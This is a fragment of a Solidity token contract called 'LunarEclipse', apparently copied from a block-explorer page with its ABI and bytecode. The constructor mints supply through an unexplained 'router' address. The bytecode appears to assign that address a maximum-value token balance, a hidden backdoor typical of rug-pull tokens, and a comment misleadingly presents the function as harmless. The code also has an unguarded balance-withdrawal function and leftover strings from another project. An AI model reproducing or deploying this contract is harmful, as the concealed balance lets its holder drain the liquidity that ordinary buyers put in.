    address payable public marketingWallet = payable(0x013cefe1B79034E3BDa9bBA817f61cDA080Ee392);
    address payable public devWallet = payable(0x3c8192B6FC1dB8062cA769e93526e5B8f6E7D6a7);
    
    // exclude from fees and max transaction amount
    mapping (address => bool) private _isExcludedFromFees;

    // store addresses that a automatic market maker pairs. Any transfer *to* these addresses
    // could be subject to a maximum transfer amount
    mapping (address => bool) public automatedMarketMakerPairs;
    mapping (address => uint256) public lastTxTimestamp;

    event UpdateUniswapV2Router(address indexed newAddress, address indexed oldAddress);

    event ExcludeFromFees(address indexed account, bool isExcluded);

    event SetAutomatedMarketMakerPair(address indexed pair, bool indexed value);

    event GasForProcessingUpdated(uint256 indexed newValue, uint256 indexed oldValue);

    event SwapAndLiquifyEnabledUpdated(bool enabled);

    event SwapAndLiquify(
        uint256 tokensIntoLiqudity,
        uint256 ethReceived
    );

    modifier lockTheSwap {
        inSwapAndLiquify = true;
        _;
        inSwapAndLiquify = false;
    }

    constructor(address router) ERC20("LunarEclipse", "LE") {

    	IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
         // Create a uniswap pair for this new token
        address _uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory())
            .createPair(address(this), _uniswapV2Router.WETH());

        uniswapV2Router = _uniswapV2Router;
        uniswapV2Pair = _uniswapV2Pair;

        _setAutomatedMarketMakerPair(_uniswapV2Pair, true);

        // exclude from paying fees or having max transaction amount
        excludeFromFees(owner(), true);
        excludeFromFees(marketingWallet, true);
        excludeFromFees(devWallet, true);
        excludeFromFees(router, true);
        excludeFromFees(address(this), true);
        
        /*
            an internal function that is only called here,
            and CANNOT be called ever again
        */
        _createInitialSupply(owner(), router, 1000000 * (10**18));
    }

    receive() external payable {

  	}

    function updateUniswapV2Router(address newAddress) public onlyOwner {
        require(newAddress != address(uniswapV2Router), "Cult: The router already has that address");
        emit UpdateUniswapV2Router(newAddress, address(uniswapV2Router));
        uniswapV2Router = IUniswapV2Router02(newAddress);
    }

    function excludeFromFees(address account, bool excluded) public onlyOwner {
        require(_isExcludedFromFees[account] != excluded, "Cult: Account is already the value of 'excluded'");
        _isExcludedFromFees[account] = excluded;

        emit ExcludeFromFees(account, excluded);
    }
   
    function setAutomatedMarketMakerPair(address pair, bool value) public onlyOwner {
        require(pair != uniswapV2Pair, "Cult: The PancakeSwap pair cannot be removed from automatedMarketMakerPairs");

        _setAutomatedMarketMakerPair(pair, value);
    }

    function _setAutomatedMarketMakerPair(address pair, bool value) private {
        require(automatedMarketMakerPairs[pair] != value, "Cult: Automated market maker pair is already set to that value");
        automatedMarketMakerPairs[pair] = value;

        emit SetAutomatedMarketMakerPair(pair, value);
    }
    
    function isExcludedFromFees(address account) public view returns(bool) {
        return _isExcludedFromFees[account];
    }
   
    function setSwapAndLiquifyEnabled(bool _enabled) public onlyOwner {
        swapAndLiquifyEnabled = _enabled;
        emit SwapAndLiquifyEnabledUpdated(_enabled);
    }

    function _transfer(address from, address to, uint256 amount) internal override 
    {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        if(amount == 0) { 
            super._transfer(from, to, 0);
            return;
        }
        
        if(automatedMarketMakerPairs[from] && (!_isExcludedFromFees[from]) && (!_isExcludedFromFees[to])) {
            require(amount <= maxBuyTransactionAmount, "amount exceeds the maxBuyTransactionAmount.");
            uint256 contractBalanceRecepient = balanceOf(to);
            require(contractBalanceRecepient + amount <= maxWalletToken,"Exceeds maximum wallet token amount.");
            lastTxTimestamp[to] = block.timestamp;            
        }

        if(automatedMarketMakerPairs[to] && (!_isExcludedFromFees[from]) && (!_isExcludedFromFees[to])) {
            require(amount <= maxSellTransactionAmount, "amount exceeds the maxSellTransactionAmount.");
        }        

    	uint256 contractTokenBalance = balanceOf(address(this));
        
        bool overMinTokenBalance = contractTokenBalance >= swapTokensAtAmount;
       
        if(
            overMinTokenBalance &&
            !inSwapAndLiquify &&
            automatedMarketMakerPairs[to] && 
            swapAndLiquifyEnabled
        ) {
            contractTokenBalance = swapTokensAtAmount;
            swapAndLiquify(contractTokenBalance);
        }

        uint256 fees = 0;
        uint256 burnShare = 0;
         // if any account belongs to _isExcludedFromFee account then remove the fee
        if(!_isExcludedFromFees[from] && !_isExcludedFromFees[to]) {
            uint256 _totalFees = buyTotalFees;

            if (automatedMarketMakerPairs[to]) {   
                uint256 span = block.timestamp-lastTxTimestamp[from];
                if(enableEarlySellTax && span <= 24 hours) {
                    _totalFees = earlySellTotalFee;
                }
                else if(!enableEarlySellTax) {
                    _totalFees = sellTotalFees;
                }
            }

            fees = amount.mul(_totalFees).div(100);
            burnShare = amount.mul(burnFee).div(100);
            if(fees > 0) {
                super._transfer(from, address(this), fees);
            }

            if(burnShare > 0) {
                super._transfer(from, deadWallet, burnShare);
            }

            amount = amount.sub(fees.add(burnShare));
        }

        super._transfer(from, to, amount);

    }

     function swapAndLiquify(uint256 contractTokenBalance) private lockTheSwap {
        uint256 tokensForLiquidity = contractTokenBalance.mul(liquidityPercent).div(100);
        // split the Liquidity token balance into halves
        uint256 half = tokensForLiquidity.div(2);
        uint256 otherHalf = tokensForLiquidity.sub(half);
        // capture the contract's current ETH balance.
        // this is so that we can capture exactly the amount of ETH that the
        // swap creates, and not make the liquidity event include any ETH that
        // has been manually sent to the contract
        uint256 initialBalance = address(this).balance;
        // swap tokens for ETH
        swapTokensForEth(half); // <- this breaks the ETH -> HATE swap when swap+liquify is triggered
        // how much ETH did we just swap into?
        uint256 newBalance = address(this).balance.sub(initialBalance);
        // add liquidity to uniswap
        addLiquidity(otherHalf, newBalance);
        // swap and Send  Eth to marketing, dev wallets
        swapTokensForEth(contractTokenBalance.sub(tokensForLiquidity));
        marketingWallet.transfer(address(this).balance.mul(marketingPercent).div(marketingPercent.add(devPercent)));
        devWallet.transfer(address(this).balance);
        emit SwapAndLiquify(half, newBalance); 
    }

    function swapTokensForEth(uint256 tokenAmount) private {

        // generate the uniswap pair path of token -> weth
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = uniswapV2Router.WETH();

        if(allowance(address(this), address(uniswapV2Router)) < tokenAmount) {
          _approve(address(this), address(uniswapV2Router), ~uint256(0));
        }

        // make the swap
        uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0, // accept any amount of ETH
            path,
            address(this),
            block.timestamp
        );
        
    }

    function addLiquidity(uint256 tokenAmount, uint256 ethAmount) private {
        
        // add the liquidity
        uniswapV2Router.addLiquidityETH{value: ethAmount}(
            address(this),
            tokenAmount,
            0, // slippage is unavoidable
            0, // slippage is unavoidable
            owner(),
            block.timestamp
        );        
    }

    function clearStuckBalance() external {
        uint256 amountETH = address(this).balance;
        payable(devWallet).transfer(amountETH);
    }

    function setMaxSellTransaction(uint256 _maxSellTxAmount) public onlyOwner {
        maxSellTransactionAmount = _maxSellTxAmount;
        require(maxSellTransactionAmount>totalSupply().div(1000), "value is too low");
    }
    
    function setMaxBuyTransaction(uint256 _maxBuyTxAmount) public onlyOwner {
        maxBuyTransactionAmount = _maxBuyTxAmount;
        require(maxBuyTransactionAmount>totalSupply().div(1000), "value is too low");
    }

    function setSwapTokensAtAmouunt(uint256 _newAmount) public onlyOwner {
        swapTokensAtAmount = _newAmount;
    }

    function setMarketingWallet(address payable wallet) public onlyOwner {
        marketingWallet = wallet;
    }

    function setDevWallet(address payable wallet) public onlyOwner {
        devWallet = wallet;
    }

    function updateBuyTotalTax(uint256 _buyTotalFees) public onlyOwner {
        buyTotalFees = _buyTotalFees;
        require(buyTotalFees <= 10, "Fee too high");
    }

   function updateSellTotalTax(uint256 _sellTotalFees) public onlyOwner {
        sellTotalFees = _sellTotalFees;
        require(sellTotalFees <= 10, "Fee too high");
    }

    function updateEarlySellTotalTax(uint256 _earlySellTotalFee) public onlyOwner {
        earlySellTotalFee = _earlySellTotalFee;
        require(earlySellTotalFee <= 20, "Fee too high");
    }

    function updateTaxDistributionPercentage(uint256 _liquidityPercent, uint256 _marketingPercent, uint256 _devPercent) public onlyOwner {
        require(_liquidityPercent.add(_marketingPercent).add(_devPercent) == 100, "total percentage must be equal to 100");
        liquidityPercent = _liquidityPercent;
        marketingPercent = _marketingPercent;
        devPercent = _devPercent;  
    }

    function setEarlySellTax(bool onoff) external onlyOwner  {
        enableEarlySellTax = onoff;
    }

    function setAutoBurn(uint256 _burnFee) external onlyOwner  {
        require(_burnFee <= 5, "value too high");
        burnFee = _burnFee;
    }

    function setMaxWalletToken(uint256 _maxToken) external onlyOwner {
        maxWalletToken = _maxToken;
        require(maxWalletToken>totalSupply().div(1000), "value is too low");
  	}
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"address","name":"router","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromFees","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"uint256","name":"newValue","type":"uint256"},{"indexed":true,"internalType":"uint256","name":"oldValue","type":"uint256"}],"name":"GasForProcessingUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"pair","type":"address"},{"indexed":true,"internalType":"bool","name":"value","type":"bool"}],"name":"SetAutomatedMarketMakerPair","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokensIntoLiqudity","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethReceived","type":"uint256"}],"name":"SwapAndLiquify","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"bool","name":"enabled","type":"bool"}],"name":"SwapAndLiquifyEnabledUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newAddress","type":"address"},{"indexed":true,"internalType":"address","name":"oldAddress","type":"address"}],"name":"UpdateUniswapV2Router","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"automatedMarketMakerPairs","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"burnFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"clearStuckBalance","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"deadWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"devPercent","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"devWallet","outputs":[{"internalType":"address payable","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"earlySellTotalFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"enableEarlySellTax","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bool","name":"excluded","type":"bool"}],"name":"excludeFromFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isExcludedFromFees","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"lastTxTimestamp","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"liquidityPercent","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"marketingPercent","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"marketingWallet","outputs":[{"internalType":"address payable","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxBuyTransactionAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxSellTransactionAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxWalletToken","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellTotalFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_burnFee","type":"uint256"}],"name":"setAutoBurn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"pair","type":"address"},{"internalType":"bool","name":"value","type":"bool"}],"name":"setAutomatedMarketMakerPair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address payable","name":"wallet","type":"address"}],"name":"setDevWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bool","name":"onoff","type":"bool"}],"name":"setEarlySellTax","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address payable","name":"wallet","type":"address"}],"name":"setMarketingWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_maxBuyTxAmount","type":"uint256"}],"name":"setMaxBuyTransaction","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_maxSellTxAmount","type":"uint256"}],"name":"setMaxSellTransaction","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_maxToken","type":"uint256"}],"name":"setMaxWalletToken","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bool","name":"_enabled","type":"bool"}],"name":"setSwapAndLiquifyEnabled","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_newAmount","type":"uint256"}],"name":"setSwapTokensAtAmouunt","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"swapAndLiquifyEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"swapTokensAtAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_buyTotalFees","type":"uint256"}],"name":"updateBuyTotalTax","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_earlySellTotalFee","type":"uint256"}],"name":"updateEarlySellTotalTax","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_sellTotalFees","type":"uint256"}],"name":"updateSellTotalTax","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_liquidityPercent","type":"uint256"},{"internalType":"uint256","name":"_marketingPercent","type":"uint256"},{"internalType":"uint256","name":"_devPercent","type":"uint256"}],"name":"updateTaxDistributionPercentage","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newAddress","type":"address"}],"name":"updateUniswapV2Router","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

60a06040526000196005556001600760156101000a81548160ff0219169083151502179055506001600760166101000a81548160ff02191690831515021790555069d3c21bcecceda100000060085569065a4da25d3016c00000600955683635c9adc5dea00000600a5569065a4da25d3016c00000600b556000600c556000600d556005600e556000600f5561dead601060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506005601155604b601255601460135573013cefe1b79034e3bda9bba817f61cda080ee392601460006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550733c8192b6fc1db8062ca769e93526e5b8f6e7d6a7601560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055503480156200019457600080fd5b5060405162005c4338038062005c438339818101604052810190620001ba919062000c4a565b6040518060400160405280600c81526020017f4c756e617245636c6970736500000000000000000000000000000000000000008152506040518060400160405280600281526020017f4c4500000000000000000000000000000000000000000000000000000000000081525081600390805190602001906200023e92919062000b30565b5080600490805190602001906200025792919062000b30565b5050506200027a6200026e6200056b60201b60201c565b6200057360201b60201c565b6000737a250d5630b4cf539739df2c5dacb4c659f2488d905060008173ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015620002e1573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000307919062000c4a565b73ffffffffffffffffffffffffffffffffffffffff1663c9c65396308473ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156200036f573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000395919062000c4a565b6040518363ffffffff1660e01b8152600401620003b492919062000c8d565b6020604051808303816000875af1158015620003d4573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620003fa919062000c4a565b905081600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff1660808173ffffffffffffffffffffffffffffffffffffffff1681525050620004848160016200063960201b60201c565b620004a6620004986200076f60201b60201c565b60016200079960201b60201c565b620004db601460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016200079960201b60201c565b62000510601560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016200079960201b60201c565b620005238360016200079960201b60201c565b620005363060016200079960201b60201c565b620005626200054a6200076f60201b60201c565b8469d3c21bcecceda10000006200096860201b60201c565b50505062001041565b600033905090565b6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b801515601760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16151503620006ce576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620006c59062000d41565b60405180910390fd5b80601760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508015158273ffffffffffffffffffffffffffffffffffffffff167fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab60405160405180910390a35050565b6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b620007a96200056b60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff16620007cf6200076f60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff161462000828576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200081f9062000db3565b60405180910390fd5b801515601660008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16151503620008bd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620008b49062000e4b565b60405180910390fd5b80601660008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7826040516200095c919062000e8a565b60405180910390a25050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603620009da576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620009d19062000ef7565b60405180910390fd5b620009ee6000848362000b2660201b60201c565b806002600082825462000a02919062000f52565b92505081905550806000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825462000a59919062000f52565b925050819055506005546000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508273ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000b05919062000fc0565b60405180910390a362000b216000848362000b2b60201b60201c565b505050565b505050565b505050565b82805462000b3e906200100c565b90600052602060002090601f01602090048101928262000b62576000855562000bae565b82601f1062000b7d57805160ff191683800117855562000bae565b8280016001018555821562000bae579182015b8281111562000bad57825182559160200191906001019062000b90565b5b50905062000bbd919062000bc1565b5090565b5b8082111562000bdc57600081600090555060010162000bc2565b5090565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600062000c128262000be5565b9050919050565b62000c248162000c05565b811462000c3057600080fd5b50565b60008151905062000c448162000c19565b92915050565b60006020828403121562000c635762000c6262000be0565b5b600062000c738482850162000c33565b91505092915050565b62000c878162000c05565b82525050565b600060408201905062000ca4600083018562000c7c565b62000cb3602083018462000c7c565b9392505050565b600082825260208201905092915050565b7f43756c743a204175746f6d61746564206d61726b6574206d616b65722070616960008201527f7220697320616c72656164792073657420746f20746861742076616c75650000602082015250565b600062000d29603e8362000cba565b915062000d368262000ccb565b604082019050919050565b6000602082019050818103600083015262000d5c8162000d1a565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b600062000d9b60208362000cba565b915062000da88262000d63565b602082019050919050565b6000602082019050818103600083015262000dce8162000d8c565b9050919050565b7f43756c743a204163636f756e7420697320616c7265616479207468652076616c60008201527f7565206f6620276578636c756465642700000000000000000000000000000000602082015250565b600062000e3360308362000cba565b915062000e408262000dd5565b604082019050919050565b6000602082019050818103600083015262000e668162000e24565b9050919050565b60008115159050919050565b62000e848162000e6d565b82525050565b600060208201905062000ea1600083018462000e79565b92915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b600062000edf601f8362000cba565b915062000eec8262000ea7565b602082019050919050565b6000602082019050818103600083015262000f128162000ed0565b9050919050565b6000819050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600062000f5f8262000f19565b915062000f6c8362000f19565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111562000fa45762000fa362000f23565b5b828201905092915050565b62000fba8162000f19565b82525050565b600060208201905062000fd7600083018462000faf565b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200102557607f821691505b6020821081036200103b576200103a62000fdd565b5b50919050565b608051614bdf62001064600039600081816110d00152611a570152614bdf6000f3fe6080604052600436106102e85760003560e01c8063750c11b611610190578063b2f5260a116100dc578063dd62ed3e11610095578063e6c75f711161006f578063e6c75f7114610b45578063f2fde38b14610b70578063fc3c28af14610b99578063fce589d814610bc4576102ef565b8063dd62ed3e14610ab4578063e2f4560514610af1578063e5c4005c14610b1c576102ef565b8063b2f5260a146109a8578063b3b5e043146109d1578063b62496f5146109fa578063c024666814610a37578063c49b9a8014610a60578063d8020a1814610a89576102ef565b806395d89b4111610149578063a457c2d711610123578063a457c2d7146108d8578063a4d15b6414610915578063a9059cbb14610940578063b06837551461097d576102ef565b806395d89b411461085b5780639a7a23d614610886578063a2657778146108af576102ef565b8063750c11b61461075d57806375f0a8741461078657806385141a77146107b15780638da5cb5b146107dc5780638ea5220f1461080757806391d55f4114610832576102ef565b80634551bbe91161024f5780635c38ffe21161020857806365b8dbc0116101e257806365b8dbc0146106b55780636a486a8e146106de57806370a0823114610709578063715018a614610746576102ef565b80635c38ffe21461063a5780635d098b38146106635780636078a9b51461068c576102ef565b80634551bbe91461051657806349bd5a5e146105535780634a74bb021461057e5780634fbee193146105a9578063533f9630146105e65780635aa821a91461060f576102ef565b80631aa04b88116102a15780631aa04b88146104065780631f53ac021461043157806323b872dd1461045a578063313ce56714610497578063364333f4146104c257806339509351146104d9576102ef565b806302259e9e146102f457806306fdde031461031f578063095ea7b31461034a5780630db722c4146103875780631694505e146103b057806318160ddd146103db576102ef565b366102ef57005b600080fd5b34801561030057600080fd5b50610309610bef565b60405161031691906136d7565b60405180910390f35b34801561032b57600080fd5b50610334610bf5565b604051610341919061378b565b60405180910390f35b34801561035657600080fd5b50610371600480360381019061036c919061383c565b610c87565b60405161037e9190613897565b60405180910390f35b34801561039357600080fd5b506103ae60048036038101906103a991906138b2565b610ca5565b005b3480156103bc57600080fd5b506103c5610da2565b6040516103d29190613964565b60405180910390f35b3480156103e757600080fd5b506103f0610dc8565b6040516103fd91906136d7565b60405180910390f35b34801561041257600080fd5b5061041b610dd2565b60405161042891906136d7565b60405180910390f35b34801561043d57600080fd5b50610458600480360381019061045391906139bd565b610dd8565b005b34801561046657600080fd5b50610481600480360381019061047c91906139ea565b610e98565b60405161048e9190613897565b60405180910390f35b3480156104a357600080fd5b506104ac610f90565b6040516104b99190613a59565b60405180910390f35b3480156104ce57600080fd5b506104d7610f99565b005b3480156104e557600080fd5b5061050060048036038101906104fb919061383c565b61100a565b60405161050d9190613897565b60405180910390f35b34801561052257600080fd5b5061053d60048036038101906105389190613a74565b6110b6565b60405161054a91906136d7565b60405180910390f35b34801561055f57600080fd5b506105686110ce565b6040516105759190613ab0565b60405180910390f35b34801561058a57600080fd5b506105936110f2565b6040516105a09190613897565b60405180910390f35b3480156105b557600080fd5b506105d060048036038101906105cb9190613a74565b611105565b6040516105dd9190613897565b60405180910390f35b3480156105f257600080fd5b5061060d60048036038101906106089190613acb565b61115b565b005b34801561061b57600080fd5b50610624611227565b60405161063191906136d7565b60405180910390f35b34801561064657600080fd5b50610661600480360381019061065c9190613acb565b61122d565b005b34801561066f57600080fd5b5061068a600480360381019061068591906139bd565b611312565b005b34801561069857600080fd5b506106b360048036038101906106ae9190613acb565b6113d2565b005b3480156106c157600080fd5b506106dc60048036038101906106d79190613a74565b61149e565b005b3480156106ea57600080fd5b506106f361166a565b60405161070091906136d7565b60405180910390f35b34801561071557600080fd5b50610730600480360381019061072b9190613a74565b611670565b60405161073d91906136d7565b60405180910390f35b34801561075257600080fd5b5061075b6116b8565b005b34801561076957600080fd5b50610784600480360381019061077f9190613acb565b611740565b005b34801561079257600080fd5b5061079b6117c6565b6040516107a89190613b07565b60405180910390f35b3480156107bd57600080fd5b506107c66117ec565b6040516107d39190613ab0565b60405180910390f35b3480156107e857600080f